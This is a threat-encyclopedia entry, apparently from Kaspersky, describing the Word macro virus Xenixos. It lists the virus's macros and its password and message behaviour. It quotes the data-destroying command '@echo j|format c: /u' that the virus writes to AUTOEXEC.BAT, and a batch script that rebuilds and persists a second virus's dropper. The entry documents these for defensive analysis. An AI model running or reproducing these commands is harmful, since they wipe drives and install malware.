Kaspersky Threats

Class

Platform

Description

Technical Details

It is encrypted virus. It contains the macros:



Drop, Dummy, AutoExec, AutoOpen, Datei�ffnen, ExtrasMakro, DateiBeenden,

DateiDrucken, DateiSpeichern, DateiSpeichernUnter, DateiDruckenStandard.

In some cases it sets the password “xenixos” for infected documents,
displays the message:



Diese Option ist derzeit leider nicht verf�gbar.

Fehler

While printing the documents it appends:



Brought to you by the Nemesis Corporation, L1996

On 1st of may the virus writes the string to the AUTOEXEC.BAT file:



@echo j|format c: /u >nul

This virus also launches “Neurobasher.b” multipartite virus. To do that the
virus creates the C:DOSSCRIPT.SCR file, and writes hexadecimal dump
of that virus into there. Then the virus creates the C:DOSEXEC.BAT file,
and writes the strings into there:



@echo off

debug < script.scr>nul

rem debugger.com

echo @c:dosdebugger.exe>>c:autoexec.bat

del c:dosscript.scr

del c:dosexec.bat

Then the virus executes that file. As the result DEBUG.EXE creates the
DEBUGGER.EXE file, and C:AUTOEXEC.BAT has new string at its end:



@c:dosdebugger.exe

So, the last command of AUTOEXEC.BAT launches dropper of “Neurobasher.b”
virus.

Class	Virus
Platform	MSWord
Description	Technical Details It is encrypted virus. It contains the macros: Drop, Dummy, AutoExec, AutoOpen, Datei�ffnen, ExtrasMakro, DateiBeenden, DateiDrucken, DateiSpeichern, DateiSpeichernUnter, DateiDruckenStandard. In some cases it sets the password “xenixos” for infected documents, displays the message: Diese Option ist derzeit leider nicht verf�gbar. Fehler While printing the documents it appends: Brought to you by the Nemesis Corporation, L1996 On 1st of may the virus writes the string to the AUTOEXEC.BAT file: @echo j\|format c: /u >nul This virus also launches “Neurobasher.b” multipartite virus. To do that the virus creates the C:DOSSCRIPT.SCR file, and writes hexadecimal dump of that virus into there. Then the virus creates the C:DOSEXEC.BAT file, and writes the strings into there: @echo off debug < script.scr>nul rem debugger.com echo @c:dosdebugger.exe>>c:autoexec.bat del c:dosscript.scr del c:dosexec.bat Then the virus executes that file. As the result DEBUG.EXE creates the DEBUGGER.EXE file, and C:AUTOEXEC.BAT has new string at its end: @c:dosdebugger.exe So, the last command of AUTOEXEC.BAT launches dropper of “Neurobasher.b” virus.

Virus.MSWord.Xenixos

Technical Details